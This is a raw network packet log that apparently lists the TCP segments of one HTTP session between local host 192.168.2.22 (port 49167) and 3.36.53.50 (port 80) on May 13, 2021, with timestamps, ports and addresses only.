May 13, 2021 08:29:32.603641987 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603657007 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603678942 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603702068 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603718042 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603730917 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603755951 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603777885 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603804111 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603818893 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603846073 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603864908 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603893995 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603907108 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603936911 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603960991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603975058 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603986979 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.604011059 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.604031086 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.604051113 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.604065895 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.604085922 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.604094982 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.604132891 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.604147911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.604175091 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.604201078 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.604229927 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.605439901 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.898271084 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.898334026 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.898364067 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.898395061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.898509979 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.898551941 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.898816109 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.898865938 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.898890018 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.898910046 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.898911953 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.898950100 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.898978949 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.899018049 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900262117 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900305033 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900345087 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900345087 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900372982 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900383949 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900418997 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900420904 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900432110 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900469065 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900511026 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900511980 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900526047 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900548935 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900587082 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900600910 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900609970 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900624037 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900641918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900660038 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900669098 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900700092 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900733948 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900737047 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900741100 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900784969 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900796890 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900827885 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900846958 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900866032 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900887012 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900903940 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900917053 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900943041 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900960922 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.900979042 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.900985003 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901016951 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901038885 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901053905 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901065111 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901102066 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901114941 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901143074 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901161909 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901180029 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901185036 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901217937 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901237011 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901256084 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901278973 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901302099 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901308060 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901344061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901362896 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901403904 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901438951 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901463032 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901470900 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901510000 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901525021 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901552916 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901567936 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901590109 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901611090 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901628017 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901632071 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901667118 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901689053 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901704073 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901721954 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901741982 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901742935 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901778936 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901801109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901827097 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901832104 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901868105 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.901885986 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.901915073 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.902101994 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.201733112 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.201796055 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.201826096 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.201864004 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.201901913 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.201939106 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.201977015 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202013969 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202047110 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202050924 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202064037 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202066898 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202080011 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202088118 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202112913 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202135086 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202138901 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202177048 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202199936 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202214003 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202231884 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202251911 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202267885 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202290058 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202307940 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202326059 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.202337027 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.202370882 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.205714941 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.205765963 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.205806971 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.205813885 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.205842018 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.205857992 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.205876112 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.205894947 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.205907106 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.205935001 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.205949068 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.205974102 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.205987930 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206011057 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206027031 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206048965 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206058025 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206085920 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206101894 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206132889 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206135035 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206176996 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206190109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206213951 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206214905 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206252098 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206264019 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206289053 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206290960 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206327915 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206361055 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206368923 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206387997 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206408024 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206418991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206454039 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206454992 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206497908 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206516981 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206533909 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206547022 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206572056 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206584930 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206609011 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206614017 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206646919 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206646919 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206685066 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206702948 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206722021 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206732035 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206758022 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206768036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206809044 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206837893 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206861973 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206876993 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206899881 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206912041 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206938028 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206940889 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.206974030 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.206990957 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207011938 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207017899 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207050085 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207066059 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207092047 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207096100 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207138062 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207149029 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207174063 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207190037 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207211971 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207216978 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207248926 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207259893 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207284927 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207285881 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207323074 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207335949 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207361937 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207364082 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207410097 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207412958 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207453012 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207463026 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207489967 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207513094 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207526922 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207540035 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207564116 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207588911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207601070 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207614899 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207639933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207644939 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207676888 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207690954 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207722902 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207725048 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207765102 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207773924 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207802057 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207825899 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207839012 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207864046 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207876921 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207889080 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207911968 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207921982 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207950115 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.207951069 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.207988977 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208034992 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208040953 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208076954 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208086967 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208112001 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208115101 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208152056 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208163023 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208189964 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208193064 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208234072 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208240032 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208272934 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208282948 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208309889 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208312035 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208359957 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208360910 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208401918 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208417892 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208441019 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208444118 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208479881 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208492041 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208517075 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208523035 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208554029 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208566904 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208591938 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208596945 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208630085 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208647966 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208678007 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208677053 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208719969 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208733082 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208755970 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208759069 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208792925 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208806992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208831072 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208839893 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208868027 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.208889961 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.208918095 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.496943951 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497000933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497030020 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497061014 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497100115 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497148037 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497189999 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497226954 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497257948 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497275114 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497296095 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497299910 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497334957 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497344971 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497361898 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497400999 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497430086 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497469902 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497505903 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497519970 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497550964 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497553110 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497594118 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497616053 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497631073 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497648001 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497668982 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497673035 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497706890 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497716904 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497744083 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497759104 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497781992 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497787952 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:33.497819901 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:33.497833014 CEST	49167	80	192.168.2.22	3.36.53.50
